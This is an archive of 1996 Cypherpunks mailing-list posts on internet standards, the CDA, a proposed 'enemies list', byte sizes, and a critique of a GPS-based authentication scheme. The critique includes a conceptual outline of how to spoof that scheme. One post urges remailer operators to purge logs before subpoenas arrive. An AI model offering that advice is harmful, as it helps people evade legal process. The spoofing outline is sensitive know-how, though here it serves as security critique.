Message-ID: <199604111804.LAA04824@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


>   There is an environment variable called HTTPS_KEYSIZE that
> is passed to cgi's by the HTTP server.

	HTTPS_SECRETKEYSIZE is the one you need to watch.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 12 Apr 1996 15:18:06 +0800
To: cypherpunks@toad.com
Subject: Re: Protocols at the Point of a Gun
Message-ID: <ad928e240e0210048d4c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:50 AM 4/11/96, Jeff Weinstein wrote:

>  Given that the IETF has no "official" (whatever that means) sanction,
>what would prevent any other organization from coming in and trying to
>take over their turf?  I saw an article today (sorry, can't remember
>where) that suggested a brewing fight between IETF and W3C over future
>HTTP and HTML standards.  If someone stands up and says that the IETF
>is becoming too slow and overcome by bickering (not my opinion, just
>a what if), and that their new group is better suited to setting standards,
>who decides who is right, and based on what criteria?  It seems that
>one aspect of anarchy is that anyone could move in and replace "their
>anarchy" with the "new anarchy".
>
>  Just some philosophical pondering late one night...

This is indeed an interesting philosophical question. Many have studied the
emergence of order in anarchic or chaotic systems: F. Hayek, R. Dawkins,
E.O. Wilson, W. Bartley, David Friedman, and many others.

Standards or modes have generally evolved without enforcement from a
central authority. Economies and markets are a good example (but perhaps
too loaded with baggage about politics, so I won't use markets as my
example here).

Language is the most obvious example of this evolution without central
authority. And everything in your paragraph above has an equivalent in
language. For example:

"It seems that one aspect of [the words we use] is that anyone could move
in and [introduce new words and others might start using them]."

Indeed, languages and cultures change. Sometimes slowly, and sometimes
quickly (a la punctuated equilibrium). But it is not necessarily an easy
thing to have such changes adopted. Inertia, other cultural/memetic forces,
and other factors give certain advantages to the status quo, with changes
percolating in. Sometimes changes happen rapidly, in an almost phase
shift-like way.

The introduction of Mosaic (and now Netscape) followed this pattern. Note
that no offical standards body dictated the form (quibblers may cite HTML
standards, but this is beside the point...), and it spread like wildfire,
either filling newly-created ecological niches or largely displacing
existing products (like gopher, archie, veronica, anonymous ftp, etc.).

A good place to read about some of this is Kevin Kelly's "Out of Control,"
where the title suggests the theme, that central control mechanisms are
dead. This applies to economies, cultural memes, evolution, and so on. And
of the aforementioned authors, Hayek's "Law, Legislation, and Liberty" is a
good source.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 12 Apr 1996 06:32:21 +0800
To: jsw@netscape.com
Subject: Re: Protocols at the Point of a Gun
In-Reply-To: <316CABB9.27F1@netscape.com>
Message-ID: <199604111516.LAA20869@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Weinstein writes:
>   Given that the IETF has no "official" (whatever that means) sanction,

I have no idea what that means. The IETF exists. Who would sanction
it? Why would that sanction matter?

> what would prevent any other organization from coming in and trying to
> take over their turf?

Nothing, except that all the people who "count" in the internet,
a.k.a. "The Community", pay attention to us. If we become irrelevant
to the community, we will fade away, which is as it should be.

> I saw an article today (sorry, can't remember where) that suggested
> a brewing fight between IETF and W3C over future HTTP and HTML
> standards.

I think way too much is made of that. Most of the same suspects attend
both meetings from what I can tell, and the IETF isn't really under
the illusion that we control HTML.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 12 Apr 1996 13:03:07 +0800
To: "Declan B. McCullagh" <cypherpunks@toad.com
Subject: Re: Know Your Net.Enemies Project
Message-ID: <ad9291d00f0210046a1c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:31 PM 4/11/96, Declan B. McCullagh wrote:
>Excerpts from cypherpunks: 11-Apr-96 Re: Know Your Net.Enemies P.. by
>Timothy C. May@got.net
>> Sort of like Nixon's Enemies List?
>>
>> Have we become the enemy?
>
>Tim, I thought that the "Enemies List" name would be seen as a
>deliberate takeoff of Nixon's Enemies List, and what I thought would be
>a humorous working title for the project until a permanent one was
>found. You may remember, BTW, that I don't have the power of the FBI to
>command.
>
>But since I was unclear and since the joke was ill-taken, I apologize.

No apology needed. I just think it's a destructive, negative idea, one that
I think could cast the Cypherpunks as a bunch of small-minded people. Maybe
it comes from living in sunny California, with its fruits, nuts, and odd
people, but I would really prefer to concentrate on positive ideas (which I
view crypto anarchy as being, by the way) than on compiling lists of
enemies.

It also seems odd that you recently characterized Dorothy Denning as a
"sweet old lady" but now propose a special page for her on the Enemies
List. I have no brief for her positions, and have opposed her positions
over the years, but I have no interest in formally demonizing her. (I
confess to _once_ having characterized her as "the Wicked Witch of the
East," but this was during the furor over the Clipper Chip, and I have
since scrupulously avoided personalizing the attack. And it was meant at
that time as a joke, obviously. I even got on well at last year's CFP with
Stewart Baker, former chief counsel of the NSA and still heavily-linked to
spooks, but I disagree _strongly_ with his views about encryption policy.
Still, I would not dream for an instant of helping to compile an Enemies
List with Stewart Baker on it!)

>To be clear: I envision this as opposition research. In the context of
>the CDA, it was very useful to know what the family values groups were
>saying -- their arguments and their strategies. A central collection
>point for such research is a useful thing.
>
>Suggestions for a working title, anyone?

I think David Friedman had a pretty good point a while back on the Cyberia
list: that compilation of such viewpoints could help opposition lawyers
prepare their cases.

Speaking for myself, I have seen Kathy Cleaver _several_ times on various
interview shows, so I know her positions on most CDA-related things. You
undoubtedly know her likely positions even better. I submit that only a
handful of Cypherpunks know more than the two of us about Cleaver's
position, for example (I include myself because I have CNN on during
ordinary working hours, or NPR, and so I get a chance most people don't
have to see her, Arianna Huffington, Ralph Reed, and suchlike, being
interviewed or giving their views.)

A research page having detailed links to their positions _might_ be useful
to those who will be facing them in court or in debates. You might ask
Godwin, Barlow, etc. if this would be useful.

But this is quite a different thing from an "Enemies List," which I rather
doubt would be useful per se to Barlow, Godwin, and other civil liberties
activists.

Maybe my viewpoint comes from just wanting to wash my hands of "those
easterners" in the Beltway-New York corridor.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 12 Apr 1996 06:59:05 +0800
To: pmacdorn@isrinc.com
Subject: GPS-based authentication
Message-ID: <199604111525.IAA09240@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Ms Denning, Mr. MacDoran

I've read with interest your proposed GPS-based authentication 
mechanism (it was posted to the cypherpunks mailing list). Can you
confirm that you wrote this? Some people on the list think it may be
a forgery.

The participants of the list have noted some apparent vulnerabilities
in the system, and I am curious as to how you address them. If you
respond to me and give permission, I'll forward your response to the
list.

The problems are two-fold:

1. The system is easily spoofed.
2. It leaks sensitive location data.

You say:

" The signature ... is formed from bandwidth compressed raw 
observations of all the GPS satellites in view."

" The location signature is virtually impossible to forge at the required 
accuracy. This is because the GPS observations at any given time are 
essentially unpredictable to high precision due to subtle satellite orbit 
perturbations, which are unknowable in real-time, and intentional 
signal instabilities  (dithering) imposed by the U.S. Department of 
Defense selective availability (SA)."

Could you substantiate this claim? Is there any reason a spoofer
could not do the following?

1. Set up a receiver near (within a 1000 miles or so) of the site he
is trying to spoof (he needs to be able to see roughly the same
satellites as the spoofed site).

2. Extract from the signal he receives the psudo-random sequence
sent from each satellite.

3. Buffer the sequence  from each satellite for a brief period (the extreme
case is 42 msec, the time it takes light to travel the diameter of the
earth).

4. Re-assemble the aggregate signal with the appropriate delays for the
location he is trying to spoof. These delays can be pre-computed.

5. Modulate a simulated 17 cm carrier appropriately to produce a synthesized 
signal, identical to that received at the location to be spoofed, and use
that to fake his location.

I note that there is commercially available test equipment to simulate
GPS satellites, which transmit a signal appropriate for any location you 
dial into them (btw, setting one of these up near a location using your
protocol  leads to an interesting denial-of-service attack, since you
can overwhelm the satellite signal with a false one giving a bogus
location).

Even if the spoofer has to extract sequence data from the real satellites,
the storage requirement is not  onerous, since he already knows just
how long he has to delay each satellite's signal, and need buffer only
the appropriate chunk for each satellite.

While this *does* result in a slight delay while the sequence data for
each satellite is gathered, the extreme case is 42 ms. Internet
transmission delays on the order of 100 ms are common, so your
system will have to accept location data which is this old.

The computational load neccesary to spoof the signal is not excessive -
it's essentially the reverse of that used to extract location data from the
aggregate  signal, a process which is not a one-way function.

Thus, the signal can be spoofed.

Second, your system broadcasts potentially sensitive location data.
Your protocol will be a gold mine for the traffic analysts  The
data can be used for later spoofing attacks, or, in an 
operational situation, to target munitions.

While encrypting the link can protect this data, if you can use encryption,
you can also use digital signatures  for authentication.

Finally, GPS receivers don't work too well in steel-framed 
buildings. There are substantial shielding and multipath problems
( for your system to work, the antenna needs to be near
the originating node, not on the roof). You do not appear to address
these problems. 

Peter Trei
trei@process.com

--------------------------------------------------------
I append the original article, as it appeared on the
list on April 10th.
--------------------------------------------------------


Location-based System Delivers User
Authentication Breakthrough

By Dorothy E. Denning and Peter F. MacDoran
Copyright(c), 1996 - Computer Security Institute - All Rights Reserved
Top - Help



Existing user authentication mechanisms are based on information the user
knows (e.g., password or PIN), possession of a device (e.g, access token or
crypto- card), or information derived from a personal characteristic
(biometrics). None of these methods are foolproof. Passwords and PINs are
often vulnerable to guessing, interception or brute force search. Devices
can be stolen. Biometrics can be vulnerable to interception and replay.

A new approach to authentication utilizes space geodetic methods to form a
time- dependent location signature that is virtually impossible to forge.
The signature is used to determine the location (latitude, longitude and
height) of a user attempting to access a system, and to reject access if the
site is not approved for that user. With location-based controls, a hacker
in Russia would be unableto log into a funds transfer system in the United
States while pretending to come from a bank in Argentina.

Location-based authentication can be used to control access to sensitive
systems, transactions or information. It would be a strong deterrent to many
potential intruders, who now hide behind the anonymity afforded by their
remote locations and fraudulent use of conventional authentication methods.
If the fraudulent actors were required to reveal their location in order to
gain access, their anonymity would be significantly eroded and their chances
of getting caught would increase.

Authentication through geodetic location has other benefits. It can be
continuous, thereby protecting against channel hijacking. It can be
transparent to the user. Unlike most other types of authentication
information, a user's location can serve as a common authenticator for all
systems the user accesses. These features make location-based authentication
a good technique to use in conjunction with single log-on. Another benefit
is there is no secret information to protect either at the host or user end.
If a user's authentication device is stolen, use of the device will not
compromise the system but only reveal the thief's location. A further
benefit of geodetic-derived location signatures is that they provide a
mechanism for implementing an electronic notary function. The notary could
attach a location signature to a document as proof that the document existed
at a particular location and instant in time.

The use of geographic location can supplement or complement other methods of
authentication, which are still useful when users at the same site have
separate accounts and privileges. Its added value is a high level of
assurance against intrusion from any unapproved location regardless of
whether the other methods have been compromised. In critical environments,
for example, military command and control, telephone switching, air traffic
control, and banking, this extra assurance could be extremely important in
order to avoid a potential catastrophe with reverberations far beyond the
individual system cracked.

How it works

International Series Research (Boulder, CO) has developed a technology for
achieving location-based authentication. Called CyberLocator, the technology
makes use of the microwave signals transmitted by the twenty-four satellite
constellation of the Global Positioning System (GPS). Because the signals
are everywhere unique and constantly changing with the orbital motion of the
satellites, they can be used to create a location signature that is unique
to a particular place and time. The signature, which is computed by a
special GPS sensor connected to a small antenna, is formed from bandwidth
compressed raw observations of all the GPS satellites in view. As currently
implemented, the location signature changes every five milliseconds.
However, there are options to create a new signature every few microseconds.

When attempting to gain access to a host server, the remote client is
challenged to supply its current location signature. The signature is then
configured into packets and transferred to the host. The host, which is also
equipped with a GPS sensor, processes the client signature and its own
simultaneously acquired satellite signals to verify the client's location to
within an acceptable threshold (a few meters to centimeters, if required).

For two-way authentication, the reverse process would be performed. In the
current implementation, location signatures are 20,000 bytes. For continuous
authentication, an additional 20 bytes per second are transferred. Re-
authorization can be performed every few seconds or longer. The location
signature is virtually impossible to forge at the required accuracy. This is
because the GPS observations at any given time are essentially unpredictable
to high precision due to subtle satellite orbit perturbations, which are
unknowable in real-time, and intentional signal instabilities  (dithering)
imposed by the U.S. Department of Defense selective availability (SA)
security policy. Further, because a signature is invalid after five
milliseconds, the attacker cannot spoof the location by replaying an
intercepted signature, particularly when it is bound to the message (e.g.,
through a checksum or digital signature). Continuous authentication provides
further protection against such attacks.

Conventional (code correlating and differential) GPS receivers are not
suitable for location authentication because they compute latitude,
longitude and height directly from the GPS signals. Thus, anyone can report
an arbitrary set of coordinates and there is no way of knowing if the
coordinates were actually calculated by a GPS receiver at that location. A
hacker could intercept the coordinates transmitted by a legitimate user and
then replay those coordinates in order to gain entry. Typical code
correlating receivers, available to civilian users, are also limited to 100
meter accuracy. The CyberLocator sensors achieve meter (or better) accuracy
by employing differential GPS techniques at the host, which has access to
its own GPS signals as well as those of the client. DGPS methods attenuate
the satellite orbit errors and cancel SA dithering effects.

Where it works

Location-based authentication is ideal for protecting fixed sites. If a
company operates separate facilities, it could be used to restrict access or
sensitive transactions to clients located at those sites. For example, a
small (7 cm x 7 cm) GPS antenna might be placed on the rooftop of each
facility and connected by cable to a location signature sensor within the
building. The sensor, which would be connected to the site's local area
network, would authenticate the location of all users attempting to enter
the protected network. Whenever a user ventured outside the network, the
sensor would supply the site's location signature. Alternatively, rather
than using a single sensor, each user could be given a separate device,
programmed to provide a unique signature for that user. Location-based
authentication could facilitate telecommuting by countering the
vulnerabilities associated with remote access over dial-in lines and
Internet connections. All that would be needed is a reasonably unobstructed
view of the sky at the employee's home or remote office. Related application
environments include home banking, remote medical diagnosis and remote
process control. Although it is desirable for an antenna to be positioned
with full view of the sky, this is not always necessary. If the location and
environment are known in advance, then the antenna can be placed on a window
with only a limited view of the sky. The environment would be taken into
account when the signals are processed at the host.

For remote authentication to succeed, the client and host must be within
2,000 to 3,000 kilometers of each other so that their GPS sensors pick up
signals from some of the same satellites. By utilizing a few regionally
deployed location signature sensors (LSS), this reach can be extended to a
global basis. For example, suppose that a bank in Munich needs to conduct a
transaction with a bank in New York and that a London-based LSS provides a
bridge into Europe. Upon receiving the location signatures from London and
Munich, the New York bank can verify the location of the Munich bank
relative to the London LSS and the London LSS relative to its own location
in New York.

The technology is also applicable to mobile computing. In many situations,
it would be possible to know the general vicinity where an employee is
expected to be present and to use that information as a basis for
authentication. Even if the location cannot be known in advance, the mere
fact that remote users make their locations available will substantially
enhance their authenticity. In his new book, The Road Ahead, Bill Gates
predicts that wallet PCs, networked to the information highway, will have
built-in GPS receivers as navigational assistants. With the CyberLocator
technology, these PC receivers can also perform authentication while being a
factor of ten less expensive than conventional code correlating receivers
(most of the processing is executed in the host rather than the remote
units), which only achieve 100 meter accuracy, and a factor of a hundred
less expensive than conventional DGPS receivers. Location-based
authentication is a powerful new tool that can provide a new dimension of
network security never before possible. The CyberLocator technology is
currently operational in a portable demonstration.


Dorothy E. Denning is professor of computer science at Georgetown
University (Washington, D.C.) and consultant to ISR. She can be reached at
202-687-5703 or denning@cs.georgetown.edu. Peter F. MacDoran is president
and CEO of International Series Research, Inc. (Boulder, CO). He can be
reached at 303-447- 0300 or pmacdorn@isrinc.com.

$0$AD

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Coverett <blake@bcdev.com>
Date: Fri, 12 Apr 1996 05:51:52 +0800
To: "'jim bell'" <jimbell@pacifier.com>
Subject: RE: questions about bits and bytes
Message-ID: <01BB279B.115D6C50@bcdev.com>
MIME-Version: 1.0
Content-Type: text/plain


> At 06:29 PM 4/10/96 -0700, Simon Spero wrote:
> >No, bytes are no always 8 bits - some machines use(d) 9-bit bytes. 
> 
> I notice you gave no examples.  Why is that?
> 
> Jim Bell
> jimbell@pacifier.com

In a past life I worked on a Honeywell DPS8 box that had 
36 bit words and 9 bit bytes.

-Blake (recalling the random evil flags that extra bit was used for)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 12 Apr 1996 22:06:34 +0800
To: Hal <cypherpunks@toad.com
Subject: Re: Anonymous Remailer threat: Scientologists may subpoena       anonymousremailer records?
Message-ID: <ad9296081002100467e3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:40 PM 4/11/96, Hal wrote:
>From: tcmay@got.net (Timothy C. May)
>> At 7:37 PM 4/10/96, Jim Byrd wrote:
>> >to find the identity of -AB-.  This turned out to be an alumni account at
>> >Cal Tech.  The poster has never been heard from again.
>>
>> This was without a doubt just a user of one of Hal Finney's remailers he
>> runs out of an account at Caltech. (There's a tiny chance it was someone
>> else, but it fits the description of Hal's "alumni" remailer exactly, and
>> is almost certainly just that.)
>
>Actually, this is not true.  The poster, from rumors I have heard, was
>someone else with a Caltech alumni account (I don't know who).  I have
>never been contacted by any representatives of Scientology with respect
>to this case.  So it is apparently just a coincidence that this case
>involved the same system as my remailer.

Several other people have sent me e-mail saying the same thing. An odd
coincidence.... I'm glad I hedged a little bit.

I did not hedge in saying that Klemesrud represented Netcom, which turns
out to be wrong (as several people corrected me on). Klemesrud apparently
ran "support.com," which got its feed from Netcom. Sorry about any
confusion.

On the remailer subpoena thing, any Cypherpunks remailer operators who are
keeping logs might want to reconsider their strategies. And any such logs
should be purged before the subpoenas arrive.

(I understand, I think, the issues of abuse that have caused some operators
to keep logs. But since the rumors of subpoenas are in the air, now is a
good time to send the message that remailer operators _generally_ cannot
produce mappings between incoming and outgoing messages. In an ideal mix,
this is of course true. And by purging old files, it becomes de facto true
for even today's far-from-ideal mixes.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 12 Apr 1996 09:17:22 +0800
To: cypherpunks@toad.com
Subject: Re: Protocols at the Point of a Gun
Message-ID: <ad91be950b021004c99c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



As required by the CDA (Competency Disclosure Act) my Ignorance bit is set
to "1" for this speculation.

At 11:03 PM 4/10/96, Lucky Green wrote:

>If my computer creates the IP packet, what is there to prevent me from
>modifying the value of the "Minor/Adult" flag at my leisure?

Are the "minor/adult" settings (and Christian/Atheist, Southern
Baptist/Reformed Baptist, Creationist/Evolutionist, etc. bits) even be
proposed to be set at the IP packet level?

I'd've thought it would be at the message level, such as this message or a
posting to Usenet. (Granted, many messages are presumably the same as IP
messages. But I'd assume that the setting would be within the message, so
that any forwarder of the packet would not be likely to tamper with
internal message settings....)

If we assume IP packet creators are altering ratings system settings, they
could just as easily be inserting CDA-violating language or images. Which
they could, unless messages were encrypted, signed, whatever.

(I'm not supporting mandatory ratings. Indeed, I oppose them.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 14 Apr 1996 00:35:37 +0800
To: jsw@netscape.com
Subject: Re: Protocols at the Point of a Gun
Message-ID: <199604111853.LAA24648@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:50 PM 4/10/96 -0700, Jeff Weinstein wrote:
>  Given that the IETF has no "official" (whatever that means) sanction,
>what would prevent any other organization from coming in and trying to
>take over their turf?  ...

It seems to me that this question represents a classic case of the costs of
market entry.  IETF has a pretty good reputation as a standards body.  If
another body were to take over its function, they would have to have
superior reputation in the relevant market (i.e. IP protocol suite
implementors and their customers).

Superior reputation could come from:

(1) Better response to proposals.  (Hard to imagine in the current 
    climate.)
(2) Government coercion.  (We will throw you in jail if you don't ...)
(3) Government coercion.  (We won't buy equipment that doesn't meet x 
    standard.)
(4) Large User coercion.  (We won't buy equipment that doesn't meet x 
    standard.  Probably no user is currently big enough to force 
    standards in this way, not even Microsoft.)

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: smith@sctc.com (Rick Smith)
Date: Fri, 12 Apr 1996 21:59:04 +0800
To: declan+@CMU.EDU ("Declan B. McCullagh")
Subject: Add me (Net.Enemies List)
Message-ID: <v01540b03ad92f701a177@[172.17.1.61]>
MIME-Version: 1.0
Content-Type: text/plain


Please add my name to your list of Net Enemies. I'd rather start out
branded as subversive and retain the freedom to be myself. Otherwise I
might be tempted to keep silent and feign political correctness.

Rick.
smith@sctc.com        secure computing corporation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Loysen <dwl@hnc.com>
Date: Sun, 14 Apr 1996 01:40:08 +0800
To: cypherpunks@toad.com
Subject: Re: On computer face recognition:
Message-ID: <199604111905.MAA07433@spike.hnc.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:02 PM 4/10/96 -0700, you wrote:
>
>On computer face recognition:
>
>
>>> Shaving probably will not be a problem, but holding your head at a
>>> slightly different angle...  will screw up the system totally,
>>> unless the system has radically improved since the last time I read
>>> up on it.
>
>At 11:45 AM 4/9/96 -0500, K00l Secrets wrote:
>> Well, the systems I have seen are quite good at finding people's eyes.
>> Scaling (for distance), and rotation (for the angle of your head)
>> therefore don't really confuse the system once it has your eyes.
>
>Finding the eyes can only control for rotations in the plane of 
>the image, when you tilt your head to one side.  They cannot 
>handle the much more common case of 3D rotations, where you 
>look slightly to the right or slightly to the left of camera.
>Facial expressions also throw them badly.
>

Take a peak at http://www.neci.nj.nec.com/homepages/lawrence/papers. One of
Lawences papers is on using Neural networks to recognize faces. Methinks
that the state of the art is advancing rapidly and such problems as not
looking at the camera or changing your expression are rapidly being overcome.


=====================================
dwl@hnc.com

Zippity do da, zippity ah, my oh my what a wonderful day.
Ya right, and hear I am without time to finish a cup of coffee.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Sat, 13 Apr 1996 01:04:49 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Protocols at the Point of a Gun
In-Reply-To: <v02120d2bad91ecd377cc@[192.0.2.1]>
Message-ID: <199604111714.NAA02244@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green writes:
>At 9:48 4/10/96, Duncan Frissell wrote:
>[...]
>>We know that governments would like to impose things like the Simple
>>Tax Transfer Protocol on the Net as well as Is A Person (and Is A Minor)
>>Protocols.
>
>There is one thing about the proposed minor flag addition to IP that I
>don't understand. [No, I am not surprised by this. Mandatory authorization
>to establish a connection and an "Internet Driver License", probably in the
>form or a smart card are coming].
>
>If my computer creates the IP packet, what is there to prevent me from
>modifying the value of the "Minor/Adult" flag at my leisure?

Yikes!  Don't lend it the credibility of calling it "proposed".
Someone might think you're serious.  "Suggested" is as far as I'd go.

Anyway, you computer creates the IP packet, but then sends it to your
ISP's router.  That router *always* makes changes to the packet header
because it must decrement the time-to-live field and recompute the
header checksum.  The ISP's router software would (in the scenario I
suggested, but deplore), based on to whom it's connected, set the
drivers licence flag as it sees fit.  When a PPP account of a "minor"
sends a packet, the router always inserts "minor".  When the account of
an adult sends it, it inserts "adult".  When the account of a partner
who has contractually accepted liability for the flag's setting sends a
packet, it leaves it alone.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 12 Apr 1996 08:38:14 +0800
To: cypherpunks@toad.com
Subject: Re: Know Your Net.Enemies Project
In-Reply-To: <olPI84q00YUuIE=vI9@andrew.cmu.edu>
Message-ID: <Pine.ULT.3.92.960411114044.21820A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 11 Apr 1996, Declan B. McCullagh wrote:

> Excerpts from cypherpunks: 11-Apr-96 Re: Know Your Net.Enemies P.. by
> Timothy C. May@got.net
> > Sort of like Nixon's Enemies List?

Don't we already have a list of anti-crypto cypherpunks? That should
definitely be added. I'll write the FUCKING STATIST section.

> > Have we become the enemy?
>
> Tim, I thought that the "Enemies List" name would be seen as a
> deliberate takeoff of Nixon's Enemies List, and what I thought would be
> a humorous working title for the project until a permanent one was
> found. You may remember, BTW, that I don't have the power of the FBI to
> command.
>
> But since I was unclear and since the joke was ill-taken, I apologize.

Cool. In retrospect, I understand that much of what you've been saying in
the last couple months was intended ironically. At least you didn't say
something really over-the-top like "fuck you and your high horse too."
Someone might have taken offense.

> To be clear: I envision this as opposition research. In the context of
> the CDA, it was very useful to know what the family values groups were
> saying -- their arguments and their strategies. A central collection
> point for such research is a useful thing.

I disagree. Anything that bundles together Canter & Siegel, the Family
Research Council, the Church of Scientology, and overzealous prosecutors
in Mannheim and Cincinatti is bound to be so all-encompassing and vague as
to be meaningless. It's like discussing "the Internet Party."

Be sure to talk about Usenet censorship at NIU, those censor-happy
homosexuals at Harvard, those Stanford speech code prosecutions, the
involvement of the Wiesenthal Center in the Zundelmatter, the theft of
conservative newspapers at Stanford and elsewhere, the censorship of, in
the News & Observer's words, an "unconventional view of the Holocaust" at
UMAss Amherst, the censorship of soc.history.war.world-war-ii, the elusive
Eric Carr, those violent threats against David Irving at Berkeley, the
coverup of the number of bits in a byte, and other urban legends.

Nonspecialist idealogues are dangerous. They tend to be sloppy with the
facts. Look at Noam Chomsky; he's an embarrassment to any serious
researcher on US interventionism in Latin America.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Fri, 12 Apr 1996 18:22:35 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: questions about bits and bytes
In-Reply-To: <JZX7LD7w165w@bwalk.dm.com>
Message-ID: <199604111722.NAA02646@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Dimitri Vulis writes:
>I used to hack a CDC Cyber box designed by Seymour Cray before he started his
>oen company. It had the following curious features:
>
>1 word = 10 _bytes_ = 60 bits
>1 _byte_ = 6 bits

. . .

>I believe BESM-6 also had 6-bit bytes. I have the dox for it someplace
>(in Russian) but can't find them offhand.
>
>Moral: it's not necessarily redundant to say '8-bit byte'.

Which is precisely the reason the IETF always refers to "bytes" as
"octets".  "Octet" is defined to be eight bits, regardless of local
word sizes.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 13 Apr 1996 02:06:40 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Protocols at the Point of a Gun
Message-ID: <199604111939.MAA14774@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


There are serious technical problems with the suggestion that labelling packets
as "Adult" or "Child" using IP options and filtering at ISPs for censorship.

IP works on a per-machine basis (technically, a per-network-interface basis,
though for most client machines that's the same thing.)  That means that a 
web or nntp server including some "Adult" material and some "Child" material
either needs
a way for an application process to communicate this to the network drivers,
or needs to label all packets as "Adult" to avoid the politically incorrect risk
of mislabelling a packet as "Child" when it's not.  The standard TCP/IP API 
programming interface software on Windows, Mac, and Unix machines doesn't
provide 
for applications to _tell_ the network drivers about IP options, so even if
IPng had censorship features added, the applications couldn't use it.
(There are a few military multi-level security versions of Unix that give
you more flexibility for this sort of thing, but they tend to provide
mandatory security so you _can't_ send a packet marked "UNCLASSIFIED" from a
"TOP SECRET" session.)  

Another problem is that it only addresses single-user client machines,
rather than multi-user operating systems such as Linux, which has a million
or so
users out there.  The model works fine when you treat a PC as a fancy version of
a dumb terminal, but a machine shared by multiple users (whether many at one
time,
or one at a time) uses a single connection to support all of them - that
means you
can't have censored material available to the child and uncensored material
available to the parent unless the networking software can pass the censorship
labels on to the application program - but again, the standard operating system
interfaces (developed over many years by thousands of The Free World's finest
developers :-) don't have a way to implement it, because it was never a
design goal.

Trying to implement censored sessions at a transport level instead has its
own problems.
First of all, TCP provides reliable sessions; censoring packets based on IP
labels
in the middle of a transaction means that TCP will retransmit until the
packet gets
through or it gives up and drops the connection, so any "Adult" packets would
dump a Registered Child out of the browser, even if they were unintentional
(e.g. from an Adult who labels all packets "Adult" to avoid being liable for
mistakes,
or packets from Europe that were default-labelled by a service provider to avoid
